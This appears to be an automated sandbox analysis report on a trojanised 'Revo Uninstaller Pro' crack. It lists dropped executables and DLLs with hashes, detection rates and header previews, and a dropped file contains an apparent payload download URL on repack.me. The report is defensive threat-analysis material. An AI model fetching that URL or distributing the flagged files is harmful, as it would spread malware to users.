                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\7zS49240581\setup.exe
                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5189528
                                                                                                                                            Entropy (8bit):6.8622234075396875
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:98304:T6666666666666666666666666666666x666666666666666fwwwwwwwwwwwwwwL:H3gRKPR+UIYbL8v515oa7I3
                                                                                                                                            MD5:11054504E4BFC58D4E36F5799797FC09
                                                                                                                                            SHA1:6DB3FFCD7771E4B153C63872A3711D3EFEA2495A
                                                                                                                                            SHA-256:BFD03E0DC2A9ADDD6FDB8FBB1309B7C72C708CF931ED9FB83849BD658C37437A
                                                                                                                                            SHA-512:7E978B663CF75B31CD067E16136F9062918081E8AD5060709EA95EB08B7922B0A4090718C694D1A0A77DEEF0A8550984AB01A54EADE3950FFF2D359AB1717E2B
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Ng.........."!.....68...........(.......................................P.....{aO...@A..........................@.m.....@.......C.8=............O..)...PO.t....J@.....................@J@.....8W8...............@.$.....@.`....................text....48......68................. ..`.rdata......P8......:8.............@..@.data...<.....A..B....@.............@....rodata.......B...... A............. ..`.tls..........B......"A.............@...CPADinfo0.....B......$A.............@...malloc_h......C......&A............. ..`.rsrc...8=....C..>...(A.............@..@.reloc..t....PO......fM.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):419886
                                                                                                                                            Entropy (8bit):7.320460842483817
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6144:q/iQb+ckQsH8TDRGKJkSvGUlYG2EY8NqK9XXHJoPNKAZzOndNyLMfjRxXdS:5Qnk3GDYKGcblBY8Y23mZ0dYmV0
                                                                                                                                            MD5:A868E9C0A97C2EF80602C0F6634913F8
                                                                                                                                            SHA1:9E3F70A600DDC17D018612B08854F702E24AE5D3
                                                                                                                                            SHA-256:691DF930404FB3CB974F183C849C4B1EDDC63EC3BCA579EEE24F8A59E702FE11
                                                                                                                                            SHA-512:611D06A34D007CB4D321400A318BA727B07971916F7207EF7D0D45383B7DC38361EA296904646F9079D9C42D87BD375F500D969BF9AA9C6906472655D84E6EF1
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 30%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...,...._......._..'...._f.'...._..'...Rich&...................PE..L....}|^..................................... ....@..................................D....@.........................@...4...t...<.... ..''...................P...!.....T............................B..@............ ..`...... ....................text............................... ..`.rdata..2.... ......................@..@.data....8..........................@....gfids..............................@..@.rsrc...''... ...(..................@..@.reloc...!...P..."..................@..B........................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35
                                                                                                                                            Entropy (8bit):4.036006945330954
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:N8MfXFLVt:2ghVt
                                                                                                                                            MD5:9D1787D69C72AE1531A6EFE6C058EBFA
                                                                                                                                            SHA1:847875E77AF8048EDF1A8A6D732D48F2A9B5CC96
                                                                                                                                            SHA-256:8C041E42595D9BF69B3293050B297A4BE644F57162DD362CA9C0E2EC15CE538D
                                                                                                                                            SHA-512:9A8CA8DFDEF274561C467B50C837C4BCA2A632995CEF8EDB565FA2872D4BD952EFD2EA0BDF32DA252CA0F949704245B8D335F1737B35F4D71ED35ADEFEE8F7C8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:https://mail.repack.me/tsjtmfdm.pkg
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\PACK.EXE
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):174444
                                                                                                                                            Entropy (8bit):7.726875563462969
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:w+pMHMfwXZawAuL45TUQ+DjasBtroikmMUx+/fmmOUpIv1BUxXmXUzyh9F:w+p9wXMwYUQ+RAzG+/a0WXPT
                                                                                                                                            MD5:7ACCFDE96C04320BA099144A7BE710CC
                                                                                                                                            SHA1:7A7994CD05C4D93FC8B2897CF061E70F6D43ED7E
                                                                                                                                            SHA-256:1C668B85525A1F2C0634631472DFDECAFEE965AEC087D37BCEB737C1D7B433A1
                                                                                                                                            SHA-512:9A17BD9C9FC0E30EFDA6E7F091758FA3D3F23E41BF17E68C1D9F4F88C9807F328CE68EFCE1B08937C67FC786838215B600C7347FD705EE5DDEFEF8EA7AC15FD3
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@..e6............@.......................... ............@..............................................C...........................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x#..........................@....ndata...................................rsrc....C.......D..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):174265447
                                                                                                                                            Entropy (8bit):6.912090216931223
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3145728:+tPWpEpfvoPWpEpOKKyPWpEpHldLPWpEpQ:+/vKKgldG
                                                                                                                                            MD5:A49C010EA61EBAC352464754FE53D710
                                                                                                                                            SHA1:A0023ABE96D6C4AB70EAE8BB51A88D1EFC841CB1
                                                                                                                                            SHA-256:4DDA9851A5EE98FEB3C219CBA4BF041A92E63AD9E514787D6CC21E0B9693BECA
                                                                                                                                            SHA-512:E43B163C0463966F53299CB74F035EB2BBEED92659A3BE1A66D25275DE893FF6CEAFC716F89EF328B21960D28242A25FD73C1029D8B3CF9E8AB2417617B42EDC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.1......,.......l........B..p...................B1......................................................z...........?.......................................................................................................................................................................G...X...............................................................................................................................................g.......................m.......................................j.......................m.......................................................................................................f...........O...]...._..................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:OpenPGP Public Key
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):285348
                                                                                                                                            Entropy (8bit):5.023570673811003
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:PUuiSzFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:cR6FfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                            MD5:710A8AFD95641F3BED3A6C5326E16E9C
                                                                                                                                            SHA1:D0E6B03AC7220D70DAB93DD061ED7A2F39125D69
                                                                                                                                            SHA-256:3F64FAC5C5B6BB8E513B7139FA28663E8DBD0ECF9DB5267FD73C7720306005F7
                                                                                                                                            SHA-512:D108A118403C22FC55156075F3D5E48D99DDDE711FD993288197C99E8E997FA52862114BF43727F1A3A3C76837DE73FFED4C8A415879FDCDDFE995F0FA12FD15
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.p......,................A......._.......o......Pp.........................................................................."...................................................................................................................................................................................j.......................G...................................................................................................................%...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):244224
                                                                                                                                            Entropy (8bit):5.312608585453437
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:NFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:NFfYCaqoDfb6mxk2LqHXj3if/Pa
                                                                                                                                            MD5:38F2B22967573A872426D05BDC1A1A70
                                                                                                                                            SHA1:ECAE471EB4E515E1006FCE645A82B70C8ACDA451
                                                                                                                                            SHA-256:83005624A3C515E8E4454A416693BA0FBF384FF5EA0E1471F520DFAE790D4AB7
                                                                                                                                            SHA-512:31BC78BB4EFC7C178C2C489B77D890B8806073180FBDD58156907C187CB73B0860701A9A2648DA1DA4930A8934C9A86B60EA5550315AFEBE833A681BCB4368E0
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..w...w...w...~.h.z...w...-...l(P.u...l(Q.v...l(`.v...l(a.v...l(f.v...Richw...................PE..L.....Eb...........!.....6...........C.......P...............................@............@.........................@`..l....X...........P...................0..L....................................................P...............................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data...TX...p.......L..............@....rsrc....P.......R...\..............@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):5.804946284177748
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                                                                                                                            MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                                                                                                                            SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                                                                                                                            SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                                                                                                                            SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
Category: dropped
Size (bytes): 72654
Entropy (8bit): 3.8234820419345263
Encrypted: false
SSDEEP: 768:HoXxl+vlXEovFcdhahaUiIJpylVrg5u4ML:HiKqD6TiIJMX48
MD5: DEC435FEBCB6AFA7D48712C6B7B7F797
SHA1: ACF1290A64873D6286B9A6845291F87AC0C5D383
SHA-256: CF0BF3E2326C6D6C60C0EB72F23D2F57E02C50B1C08012EC0F3490AD7992F85A
SHA-512: 84698DF0E436B4EF7B24AD2D59F2FC6AA960723D5B430C069B788C875332F8C36677A08C9DFD25ECBAE1A3D1472CC8D6A339CC3F8D00A7B4D7815B25F3AD8898
Malicious: false

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
Category: dropped
Size (bytes): 72654
Entropy (8bit): 4.179276254881405
Encrypted: false
SSDEEP: 384:9lE1kJkgWOWeRFeCenb4GirH7GIG6vy5uavIcEBCGeBHdFbrEfwcwV+:s1kgbmAFbrEfwcwA
MD5: 03E71E2F27CB3C60F2515B378D5934A7
SHA1: E9B43186EB393D73EACC10E5F7F116E78FDC0CE1
SHA-256: 242603B8262926CB598FF0F8094775CF6A4EC4FA5DC8191B9CF226888AF9F96E
SHA-512: E27B5BE6E99FD9295FEC301BCBB286175D833E51C9E0E651BB746FA6B8E4E196BF85115CD94B99D18E01D93D6699F111AA0EA9C240975E07BE20EAA3E4D6D550
Malicious: false

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
Category: dropped
Size (bytes): 72654
Entropy (8bit): 3.8127911901112443
Encrypted: false
SSDEEP: 192:Mr6Nzec6u9cNl0aUxJiHKDVthKheoH0vs7wwGI8Ean8e++y/rnpqnfbTqFBrec22:Mm8c6xl0v42h1lUnMnz/Gy8KqiSD
MD5: FC176015020E80F8266906905D30536D
SHA1: AB5FB655990467D9158B52099B78F9FB63FF12EE
SHA-256: 475853E54B9B40AB85E3D7FEED1C3EE9CC4E34444E2068B63627A9235E5B6333
SHA-512: 378F736359052FC76088BCE0FAF9EE987EEC67BB3AC065E9FD8E93FA8DFC808BB13B27A4A3BDF13FEF652A895885FBD36EF1514571184E31E98C075BA404FB5
Malicious: false

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PC bitmap, Windows 3.x format, 165 x 110 x 32, image size 72600, resolution 3780 x 3780 px/m, cbSize 72654, bits offset 54
Category: dropped
Size (bytes): 72654
Entropy (8bit): 4.191279757299406
Encrypted: false
SSDEEP: 384:oamCMUJkgWOWeRFeCenb4GirH7GIG6vy5uavIcEBCGeBHdFbrEfwcwV+:CpUgbmAFbrEfwcwA
MD5: 7B91A8BD71A1534BED881C524474AA66
SHA1: 4C85276D711DD163E47236E139271D4AB6BDA280
SHA-256: 3392CF7BA5655BC4624D133947E13683D4447FAFB1EA6926F070FC3FD3C499B1
SHA-512: D17F48F339C4C79CE4118D59B22DF283FDF8DEE288BFEFCD7374663C47843C8F311B30A3D5853F62C4F10895197F9C9F6B122FE27B0B67F1D72EA4B87289A9D0
Malicious: false

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 244224
Entropy (8bit): 5.312608585453437
Encrypted: false
SSDEEP: 3072:NFf2FNF6iQraqoDDfbrH6ZgxkzStPpwGxqeujXj5Bif/Pa0A:NFfYCaqoDfb6mxk2LqHXj3if/Pa
MD5: 38F2B22967573A872426D05BDC1A1A70
SHA1: ECAE471EB4E515E1006FCE645A82B70C8ACDA451
SHA-256: 83005624A3C515E8E4454A416693BA0FBF384FF5EA0E1471F520DFAE790D4AB7
SHA-512: 31BC78BB4EFC7C178C2C489B77D890B8806073180FBDD58156907C187CB73B0860701A9A2648DA1DA4930A8934C9A86B60EA5550315AFEBE833A681BCB4368E0
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 5632
Entropy (8bit): 3.817430038996001
Encrypted: false
SSDEEP: 48:S46+/sTKYKxbWsptIp5tCZ0iVEAWyMEv9v/ft2O2B8mWofjLl:z+uPbO5tCZBVEAWyMEFv2Cm9L
MD5: 549EE11198143574F4D9953198A09FE8
SHA1: 2E89BA5F30E1C1C4CE517F28EC1505294BB6C4C1
SHA-256: 131AA0DF90C08DCE2EECEE46CCE8759E9AFFF04BF15B7B0002C2A53AE5E92C36
SHA-512: 0FB4CEA4FD320381FE50C52D1C198261F0347D6DCEE857917169FCC3E2083ED4933BEFF708E81D816787195CCA050F3F5F9C5AC9CC7F781831B028EF5714BEC8
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 12288
Entropy (8bit): 5.804946284177748
Encrypted: false
SSDEEP: 192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
MD5: 192639861E3DC2DC5C08BB8F8C7260D5
SHA1: 58D30E460609E22FA0098BC27D928B689EF9AF78
SHA-256: 23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
SHA-512: 6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PC bitmap, Windows 3.x format, 150 x 57 x 24, resolution 2835 x 2835 px/m, cbSize 25818, bits offset 54
Category: dropped
Size (bytes): 25818
Entropy (8bit): 2.1654611461266877
Encrypted: false
SSDEEP: 192:qfsz6YadoZ+HPwmWxS04WKWEFCidDIaThy:q0zDadRPNW0CICiyaThy
MD5: 414D457C540048704D144FB2A0D2BC73
SHA1: 5021B23ABACB37EDC3E099132A9FF83A0AD5E3E9
SHA-256: B0537E5F4FE7E8FAC0C093BFB83E7F633EF4F8DA6649F73329EA1B2777956DE2
SHA-512: C1B90F31950F3AC5CD65BDDCFCAEFB4A722EC6F91327437734FE05C8989004F2268662DF5631FDB6A6F23E28080BABCBCFBBE112F0EBB3B850D17395484FF355
Malicious: false

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 9728
Entropy (8bit): 5.157714967617029
Encrypted: false
SSDEEP: 96:ooEv02zUu56FcS817eTaXx85qHFcUcxSgB5PKtAtoniJninnt3DVEB3YMNqkzfFc:ooEvCu5e81785qHFcU0PuAw0uyyIFc
MD5: B7D61F3F56ABF7B7FF0D4E7DA3AD783D
SHA1: 15AB5219C0E77FD9652BC62FF390B8E6846C8E3E
SHA-256: 89A82C4849C21DFE765052681E1FAD02D2D7B13C8B5075880C52423DCA72A912
SHA-512: 6467C0DE680FADB8078BDAA0D560D2B228F5A22D4D8358A1C7D564C6EBCEFACE5D377B870EAF8985FBEE727001DA569867554154D568E3B37F674096BBAFAFB8
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 7168
Entropy (8bit): 5.295306975422517
Encrypted: false
SSDEEP: 96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
MD5: 11092C1D3FBB449A60695C44F9F3D183
SHA1: B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
SHA-256: 2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
SHA-512: C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14300
                                                                                                                                            Entropy (8bit):4.0538420518958445
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:8I3O/0+JPRZPXiPyNhiv2wBApVYO8N78nVvN9QGzD8:j9UDSPyNhiv2wBApVYO8NaxN9QGzD8
                                                                                                                                            MD5:0E7277E0D003E84326ECF8D4793C70B0
                                                                                                                                            SHA1:DB2A6EDC05678FFF798B72DB5EACB2D5634E4A90
                                                                                                                                            SHA-256:BCBB4D8AF5A3EFFDE3D47DEE88E1BC9E768C3335210634968A8B76A2CFCAB95D
                                                                                                                                            SHA-512:65E9C61BE80EEBB8BBC4770949FC2E8F6FDA7FCE8C209F5226F76A226AEE85E1089FCF70A2C7F16367FCB7F5457E9F5F9F4DC79BD9D7E733BE88BAA5381EA8FE
                                                                                                                                            Malicious:false
